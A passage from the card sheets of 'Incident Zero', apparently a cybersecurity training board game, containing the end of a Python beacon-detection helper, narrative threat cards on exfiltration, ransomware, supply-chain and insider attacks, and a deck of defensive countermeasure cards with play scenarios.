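    return results


def flagged_pairs(results):
    """Pairs worth a threat-intelligence lookup, most regular first."""
    hits = [(pair, r) for pair, r in results.items() if r["beacon_like"]]
    return [pair for pair, _ in sorted(hits, key=lambda item: item[1]["jitter"])]


if __name__ == "__main__":
    report = beacon_candidates(parse_flows(SAMPLE_FLOWS))
    for pair in flagged_pairs(report):
        print(f"{pair[0]} -> {pair[1]}: {report[pair]}")
```

Treat the jitter threshold as a tuning knob rather than a verdict: legitimate software (update checks, monitoring agents) also polls on a schedule, so a low-jitter pair is a lead to combine with the threat-intelligence check the card mentions, not an alert on its own.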

Card T-10: SQL Database Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION           │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Database audit logs show a large   │
│ SELECT query executed by a service  │
│ account retrieving customer data.   │
│ Results (500k+ records) were piped  │
│ to a temporary file. System logs    │
│ show this file was copied to cloud  │
│ storage via encrypted connection."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Database exfiltration bypasses      │
│ endpoint controls. Attackers use    │
│ legitimate protocols (HTTPS, SFTP)  │
│ to trusted services (S3, Dropbox).  │
│ Without DLP (Data Loss Prevention)  │
│ and egress filtering, detection is  │
│ nearly impossible.                  │
└─────────────────────────────────────┘

Card T-11: Ransomware Payload Deployment

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT       │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR alerts spike as multiple       │
│ processes begin encrypting files    │
│ on the file server. Hundreds of     │
│ files change extension to '.locked'.│
│ A ransom note appears on all        │
│ administrative workstations. Network│
│ traffic shows exfil before          │
│ encryption began (double extortion  │
│ tactic)."                           │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Modern ransomware exfiltrates data  │
│ first (to extort payment), then     │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file  │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential.                      │
└─────────────────────────────────────┘

Card T-12: Browser Extension Backdoor

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR          │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Browser logs show installation of  │
│ a suspicious extension claiming to  │
│ be a productivity tool. Traffic     │
│ analysis reveals the extension is   │
│ capturing keystrokes and session    │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Browser extensions run with full    │
│ access to user activity. They can   │
│ capture credentials, intercept      │
│ HTTPS traffic (before encryption),  │
│ and persist across browser updates. │
│ Extension vetting and endpoint      │
│ protection are critical defenses.   │
└─────────────────────────────────────┘

DEFENSE CARDS

Tier System

Countermeasure Vectors

Defense cards counter specific Attack Vectors:
- SOCIAL ENGINEERING
- WEB EXPLOIT
- CREDENTIAL ABUSE
- MALWARE
- NETWORK
- DATA EXFIL


SAMPLE DEFENSE CARD DECK (24 Cards)

Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).

BASIC DEFENSES (10 Budget Each)

Card D-01: Email Authentication Setup

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy SPF (Sender Policy           │
│ Framework), DKIM (DomainKeys        │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email       │
│ spoofing. Implement enforcement     │
│ policies to reject spoofed emails.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks phishing emails claiming to  │
│ be from your domain. Requires       │
│ attackers to find alternative       │
│ vectors. Also provides reporting on │
│ spoofing attempts.                  │
└─────────────────────────────────────┘

Card D-02: User Security Training

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing,  │
│ urgency tactics, and credential     │
│ harvesting attempts. Run simulated  │
│ phishing campaigns.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first     │
│ line of defense. Works best when    │
│ combined with technical controls.   │
└─────────────────────────────────────┘

Card D-03: Windows Update Patching

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING             │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy automated Windows Update     │
│ management across all systems.      │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2      │
│ weeks). Audit compliance with patch │
│ reporting.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Closes browser and kernel           │
│ vulnerabilities. Prevents watering  │
│ hole and exploit kit attacks. Should│
│ be combined with vulnerability      │
│ scanning to identify gaps.          │
└─────────────────────────────────────┘

Card D-04: Network Firewall Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy perimeter firewall rules to  │
│ block unauthorized outbound         │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business   │
│ traffic.                            │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents early-stage lateral        │
│ movement and C2 beaconing.          │
│ Slows attacker reconnaissance.      │
│ Must be maintained with threat      │
│ intelligence feeds.                 │
└─────────────────────────────────────┘

Card D-05: Log Centralization

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION                  │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy centralized log aggregation  │
│ (syslog, Splunk, ELK). Forward      │
│ Windows Event Logs, firewall logs,  │
│ DNS queries, and proxy logs to      │
│ central SIEM. Configure syslog      │
│ integrity protection.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes local log tampering difficult.│
│ Provides investigative visibility   │
│ into attacker activities. Foundation│
│ for threat hunting and compliance.  │
└─────────────────────────────────────┘

Card D-06: Basic Antivirus Deployment

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy signature-based antivirus    │
│ across all endpoints. Enable        │
│ automatic definition updates        │
│ (daily). Configure real-time file   │
│ and email scanning.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches known malware variants.     │
│ Does not detect zero-day or         │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense.                 │
└─────────────────────────────────────┘

Card D-19: Backup & Disaster Recovery

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup          │
│ strategy: 3 copies of data, 2       │
│ different storage types, 1 offsite  │
│ copy. Test restore procedures       │
│ quarterly.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables rapid recovery from         │
│ ransomware. Ensures data            │
│ availability even if primary        │
│ systems are compromised. Critical   │
│ for business continuity.            │
└─────────────────────────────────────┘

Card D-23: IR Program & Runbooks

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS               │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish an incident response      │
│ program with detailed runbooks for  │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware,      │
│ insider threats, supply chain       │
│ compromise. Include roles,          │
│ responsibilities, and communication │
│ plans.                              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster, more coordinated    │
│ response when incidents occur.      │
│ Reduces confusion during high-      │
│ pressure situations. Improves       │
│ incident containment and recovery   │
│ time.                               │
└─────────────────────────────────────┘

ADVANCED DEFENSES (15 Budget Each)

Card D-07: Multi-Factor Authentication (MFA)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy MFA for all remote access    │
│ (VPN, RDP), email, and admin        │
│ portals. Use authenticator apps or  │
│ hardware tokens (not SMS). Enforce  │
│ MFA on sensitive user accounts.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes compromised credentials       │
│ useless without the second factor.  │
│ Blocks credential stuffing attacks. │
│ Most effective single security      │
│ measure against account takeover.   │
└─────────────────────────────────────┘

Card D-08: EDR (Endpoint Detection & Response)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy EDR agent on all endpoints.  │
│ Monitor process execution, file     │
│ creation, registry modifications,   │
│ and memory injection attempts.      │
│ Enable behavioral analytics and     │
│ automated response.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and  │
│ threat hunting. Provides deep       │
│ visibility into attack progression. │
└─────────────────────────────────────┘

Card D-09: Network Segmentation

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION                │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement VLANs and                 │
│ microsegmentation to separate user  │
│ workstations from servers. Deploy   │
│ firewall rules between segments.    │
│ Implement zero-trust network access │
│ controls.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents lateral movement via SMB   │
│ and other internal protocols.       │
│ Limits blast radius of compromise.  │
│ Forces attackers to find alternate  │
│ paths. Combined with MFA, highly    │
│ effective.                          │
└─────────────────────────────────────┘

Card D-10: SIEM Correlation Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES              │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Create SIEM rules to detect attack  │
│ patterns: failed login spikes,      │
│ privilege escalation attempts,      │
│ unusual process creation, scheduled │
│ task creation, and data exfil       │
│ indicators.                         │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Correlates events across logs to    │
│ detect multi-step attacks. Reduces  │
│ alert fatigue through smart         │
│ aggregation. Enables faster         │
│ investigation and response.         │
└─────────────────────────────────────┘

Card D-11: Data Loss Prevention (DLP)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP)          │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data  │
│ (customer PII, source code, trade   │
│ secrets). Block or alert on         │
│ unauthorized transfers to cloud     │
│ storage, email, USB, or external    │
│ networks.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents SQL database exfiltration  │
│ and bulk data theft. Detects        │
│ unusual data access patterns.       │
│ Enforces data security policies.    │
│ Works best with strong              │
│ authentication and encryption.      │
└─────────────────────────────────────┘

Card D-12: Password Manager & Vault

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise password vault    │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement  │
│ password rotation policies for      │
│ service accounts. Enable audit      │
│ logging for credential access.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents credential reuse attacks.  │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation.         │
└─────────────────────────────────────┘

Card D-18: Intrusion Prevention System (IPS)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy network-based IPS with       │
│ exploit signatures. Monitor for     │
│ known CVE exploitation patterns.    │
│ Configure WAF (Web Application      │
│ Firewall) rules for SQL injection,  │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks exploitation attempts in     │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching.        │
└─────────────────────────────────────┘

Card D-24: Threat Intelligence Integration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION     │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK,           │
│                  DATA EXFIL         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Subscribe to threat intelligence    │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM,    │
│ and proxy. Participate in           │
│ information sharing communities.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster detection of known   │
│ malicious IPs and domains.          │
│ Identifies emerging threats         │
│ targeting your industry. Reduces    │
│ detection time from days to minutes.│
└─────────────────────────────────────┘

ELITE DEFENSES (25 Budget Each)

Card D-13: Threat Hunting Program

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM              │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish proactive threat hunting  │
│ using MITRE ATT&CK framework.       │
│ Hunt for living-off-the-land        │
│ techniques, anomalous processes,    │
│ suspicious registry changes, and    │
│ memory injection. Use automated     │
│ tools (OSQuery, Velociraptor).      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Finds advanced attacks that bypass  │
│ signature-based detection. Detects  │
│ LSASS dumping, scheduled task       │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly.   │
└─────────────────────────────────────┘

Card D-14: Memory Forensics

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MEMORY FORENSICS                    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy memory capture and analysis  │
│ (Volatility, Memoryze). Create      │
│ memory images of suspicious systems.│
│ Analyze for credential dumping,     │
│ injected code, and rootkits. Extract│
│ evidence for incident response.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects Mimikatz attacks and        │
│ credential harvesting. Reveals      │
│ attacker activities hidden from     │
│ disk forensics. Critical for        │
│ identifying advanced persistence    │
│ mechanisms.                         │
└─────────────────────────────────────┘

Card D-15: Deception Technology (Honeypots)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS)    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy decoy systems (fake file     │
│ servers, databases, credentials)    │
│ to detect lateral movement. Create  │
│ canary tokens that alert when       │
│ accessed. Deploy honeypots for web  │
│ exploit detection.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Any access to honeypots indicates   │
│ active compromise. Detects lateral  │
│ movement with zero false positives. │
│ Slows attacker progress and forces  │
│ reconnaissance, increasing detection│
│ time.                               │
└─────────────────────────────────────┘

Card D-16: Credential Guard & Secure Boot

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable Windows Credential Guard to  │
│ isolate LSASS in virtualized        │
│ container. Implement UEFI Secure    │
│ Boot to prevent bootkit attacks.    │
│ Enable TPM attestation for device   │
│ integrity validation.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes Mimikatz credential dumping   │
│ ineffective. Prevents bootloader    │
│ manipulation. Ensures firmware      │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘

Card D-17: Advanced Malware Sandbox

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED MALWARE SANDBOX            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced sandboxing solution │
│ (Cuckoo, Detonate, hybrid-analysis).│
│ Analyze suspicious files/URLs in    │
│ isolated environments. Generate     │
│ behavioral indicators and YARA      │
│ rules. Share IOCs with threat intel.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects zero-day malware and unknown│
│ exploits. Analyzes evasion tactics. │
│ Generates detection rules for SIEM. │
│ Prevents spread of novel malware.   │
└─────────────────────────────────────┘

Card D-20: Zero Trust Access Control

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ZERO TRUST ACCESS CONTROL           │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement zero-trust architecture:  │
│ verify every access request         │
│ regardless of source. Deploy device │
│ identity, user identity, and        │
│ behavior analytics. Implement       │
│ conditional access policies.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Eliminates implicit trust based on  │
│ network location. Even compromised  │
│ devices cannot access sensitive     │
│ resources without proper            │
│ authentication and behavior         │
│ validation.                         │
└─────────────────────────────────────┘

Card D-21: Container Security & Orchestration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER SECURITY & ORCHESTRATION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy container runtime security   │
│ (Falco, Sysdig). Implement image    │
│ scanning for vulnerabilities. Use   │
│ policy enforcement engines (OPA/    │
│ Gatekeeper). Implement network      │
│ policies for container              │
│ segmentation.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects container escape attempts.  │
│ Prevents vulnerable images from     │
│ running. Limits lateral movement    │
│ within containerized environments.  │
│ Critical for modern cloud           │
│ applications.                       │
└─────────────────────────────────────┘

Card D-22: Security Information & Event Management (SIEM)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SECURITY INFO & EVENT MGMT (SIEM)   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise SIEM (Splunk,     │
│ ELK, QRadar). Centralize logs from  │
│ all sources. Implement automated    │
│ correlation rules, threat           │
│ intelligence integration, and       │
│ incident response workflows.        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides centralized visibility     │
│ into all security events. Enables   │
│ rapid threat detection and          │
│ investigation. Foundation for a     │
│ mature incident response program.   │
└─────────────────────────────────────┘

Sample Printable Card Layouts

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability
  4. For color printing: Use the color-coded vectors (red for MALWARE, blue for CREDENTIAL ABUSE, etc.)

Recommended Colors for Vectors


Card Deck Summary

Threat Cards (12 Total)

Defense Cards (24 Total)

Distribution by Countermeasure (v2.2):
  - SOCIAL ENGINEERING: 2 defenses (D-01, D-02)
  - WEB EXPLOIT: 2 defenses (D-03, D-18)
  - CREDENTIAL ABUSE: 4 defenses (D-07, D-12, D-16, D-20)
  - MALWARE: 8 defenses (D-05, D-06, D-08, D-13, D-14, D-17, D-19, D-21)
  - NETWORK: 7 defenses (D-04, D-09, D-10, D-15, D-22, D-23, D-24)
  - DATA EXFIL: 2 defenses (D-11, D-24)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA EXFIL) and appears in both rows, so the vector rows sum to 25 tags across 24 cards.


Suggested Play Scenarios

Scenario 1: Startup Security Breach (3-card chain - Beginner)

  1. Phishing Campaign → Deploy Email Authentication or User Training
  2. Mimikatz Credential Dumping → Deploy MFA or Credential Guard
  3. Data Exfiltration via Browser Extension → Deploy DLP or Threat Hunting

Scenario 2: SMB Lateral Movement (4-card chain - Intermediate)

  1. Compromised Credentials → Deploy MFA
  2. Lateral Movement via SMB → Deploy Network Segmentation
  3. Privilege Escalation → Deploy EDR or Threat Hunting
  4. Beaconing to C2 → Deploy Firewall Rules or IPS

Scenario 3: Advanced Ransomware Campaign (5-card chain - Expert)

  1. Watering Hole Attack → Deploy Patching or IPS
  2. Privilege Escalation via Kernel Exploit → Deploy EDR
  3. Scheduled Task Persistence → Deploy Memory Forensics
  4. Mimikatz Credential Dumping → Deploy Credential Guard
  5. Ransomware Deployment → Deploy DLP and Deception Technology

Expansion Decks

The ideas below have been built out as printable expansion cards:

Expansion Threat Cards (T-13 to T-20)

Supply chain attacks, insider threats, IoT device compromise, cloud API abuse, DNS tunneling, and physical security bypass — see ../expansion-deck/advanced-threats.md.

Expansion Defense Cards (D-25 to D-43)

Application whitelisting, behavioral analytics, container security, cloud security posture management, response playbooks, and backup/DR variants — see ../expansion-deck/advanced-defenses.md.


Sample card sheets for the Incident Zero board game. For complete game rules, see docs/rules/core-rules.md and docs/rules/module-incident-response.md.

cards/incident-response/expansion-deck/advanced-threats.md

Incident Zero: Expansion Threat Cards

Advanced Attack Scenarios & Additional Threats

This document provides additional Threat Cards for expanding Incident Zero gameplay beyond the base 12-card deck. These cards introduce more sophisticated attack vectors and modern threat landscape scenarios.


ADDITIONAL THREAT CARDS (8 Cards)

Supply Chain Attack Threats

Card T-13: Compromised Software Vendor Update

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED SOFTWARE VENDOR UPDATE  │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your monitoring systems detect     │
│ unusual outbound connections from   │
│ a recently deployed software update │
│ to an IP address not associated     │
│ with the vendor. The update was     │
│ digitally signed but verification   │
│ shows the signature was backdated.  │
│ Hundreds of organizations received  │
│ the same malicious update."         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Supply chain compromises affect     │
│ entire industries simultaneously.   │
│ Organizations trust vendor updates  │
│ and often deploy them automatically │
│ without deep inspection. The        │
│ attacker gains access to thousands  │
│ of targets at once. Real-world      │
│ example: SolarWinds, 3CX.           │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ The malware appears legitimate due  │
│ to trusted vendor origin.           │
└─────────────────────────────────────┘

Card T-14: Malicious Third-Party Library Injection

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS THIRD-PARTY LIBRARY       │
│ INJECTION                           │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your dependency scanning tool      │
│ alerts on a typosquatted NPM        │
│ package (npm package manager) that  │
│ was installed in your build         │
│ pipeline. The malicious package has │
│ the same name as a popular logging  │
│ library but with a slight misspell. │
│ It has been downloaded 50k times.   │
│ Your build logs show it was         │
│ installed 6 days ago."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Developers rely on open-source      │
│ packages from package managers      │
│ (npm, PyPI, Maven). Attackers       │
│ upload malicious packages with      │
│ names similar to popular libraries  │
│ (typosquatting). Once downloaded,   │
│ the malicious code runs during      │
│ build/deployment. This affects      │
│ every application built from that   │
│ point forward.                      │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires dependency scanning and    │
│ behavior analysis of build          │
│ processes.                          │
└─────────────────────────────────────┘

Insider Threat Cards

Card T-15: Malicious Insider Data Theft

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MALICIOUS INSIDER DATA THEFT        │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DLP system flags a large      │
│ volume of sensitive data being      │
│ copied by an IT operations          │
│ employee during off-hours. Their    │
│ user account accessed databases     │
│ they don't normally interact with.  │
│ The data was copied to a removable  │
│ USB drive connected to a shared     │
│ workstation. Security badge logs    │
│ show they entered the building at   │
│ 2 AM when the office was empty."    │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Insiders have legitimate access and │
│ often bypass security controls.     │
│ Their activities may not trigger    │
│ alerts because their permissions    │
│ are valid. Detection requires:      │
│ - Behavioral analysis (unusual      │
│  times/volumes)                     │
│ - Physical security controls        │
│ - DLP and USB device control        │
│ - Privileged access management      │
│ Insiders cause 30-40% of data       │
│ breaches in many industries.        │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Insider actions often look normal   │
│ to automated systems.               │
└─────────────────────────────────────┘

Card T-16: Disgruntled Employee Sabotage

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DISGRUNTLED EMPLOYEE SABOTAGE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A recently terminated database     │
│ administrator appears to have       │
│ retained remote access using a      │
│ dormant service account they        │
│ created months ago. Logs show       │
│ connection attempts from their      │
│ home IP address. They've been       │
│ modifying stored procedures and     │
│ adding logic bombs set to trigger   │
│ in 30 days. Your team notices       │
│ their employee laptop is still      │
│ configured with VPN certificates."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Disgruntled employees often have    │
│ privileged access and deep system   │
│ knowledge. They may have created    │
│ backdoors before termination.       │
│ Offboarding failures (not revoking  │
│ certs, not disabling accounts) are  │
│ common. Defense requires:           │
│ - Complete offboarding procedures   │
│ - Privileged access review          │
│ - Anomalous activity detection      │
│ - Behavior analysis for terminated  │
│  employees                          │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires correlation of access      │
│ patterns and employee status        │
│ changes.                            │
└─────────────────────────────────────┘

IoT Device Compromise

Card T-17: Compromised IoT Device as Pivot Point

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED IOT DEVICE AS PIVOT     │
│ POINT                               │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
